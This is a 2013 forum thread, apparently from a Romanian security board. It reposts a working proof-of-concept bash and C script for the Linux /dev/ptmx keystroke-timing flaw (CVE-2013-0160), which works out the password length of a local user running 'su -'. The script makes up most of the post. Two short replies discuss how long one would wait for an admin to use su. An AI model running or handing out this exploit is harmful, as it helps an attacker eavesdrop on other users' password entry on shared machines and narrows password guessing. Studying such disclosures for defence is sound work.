Nytro Posted February 5, 2013 Report Share Posted February 5, 2013 [h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h]#!/bin/bash# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local# user who runs "su -". Done thanks to the ptmx keystroke timing attack# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for# more information. ## Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).## "THE BEER-WARE LICENSE" (Revision 42):# <vladz@devzero.fr> wrote this file. As long as you retain this notice# you can do whatever you want with this stuff. If we meet some day, and# you think this stuff is worth it, you can buy me a beer in return. -V.if ps -e -o cmd= | egrep -q "^(-|^)su"; then echo "[-] Kill/close all running \"su\" session before using this PoC" exit 1fiexe=$(mktemp) || exit 1tmp=$(mktemp) || exit 1cat > ${exe}.c << _EOF_#include <stdio.h>#include <signal.h>#include <unistd.h>#include <sys/inotify.h>static int count = 0;void display_result() { printf("[+] password len is %d\n", count-1); _exit(0);}int main() { int fd; char buf[1024]; signal(SIGINT, display_result); fd = inotify_init(); inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY); while(read(fd, buf, 1024)) count++; return 0;}_EOF_cc -o ${exe}{,.c}echo "[*] Wait for someone to run \"su -\""while true; do ps -e -o cmd= | egrep "^(-|^)su" >${tmp} x=$(wc -l ${tmp}) case ${x% *} in 1) (( run )) && continue; echo -n "[+] su detected, full command: " cat ${tmp}; ${exe} & (( run = 1 )) ;; 2) [ ! -z "$!" ] && kill -2 $!; break ;; esacdonerm -f ${exe}{,.c} ${tmp}Sursa: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure Quote Link to comment Share on other sites More sharing options...
backdoor Posted February 6, 2013 Report Share Posted February 6, 2013 Nice , sunt curios cate ore trebuie sa stai logat ca sa intre un admin sa apeleze "su", Si daca se logheaza direct cu root ? Am sa il testez si eu pe alte os'uri cand oi avea oleak de timp. Quote Link to comment Share on other sites More sharing options...
boogy Posted February 6, 2013 Report Share Posted February 6, 2013 Daca se logheaza direct cu root inseamna ca nu este un bun admin Quote Link to comment Share on other sites More sharing options...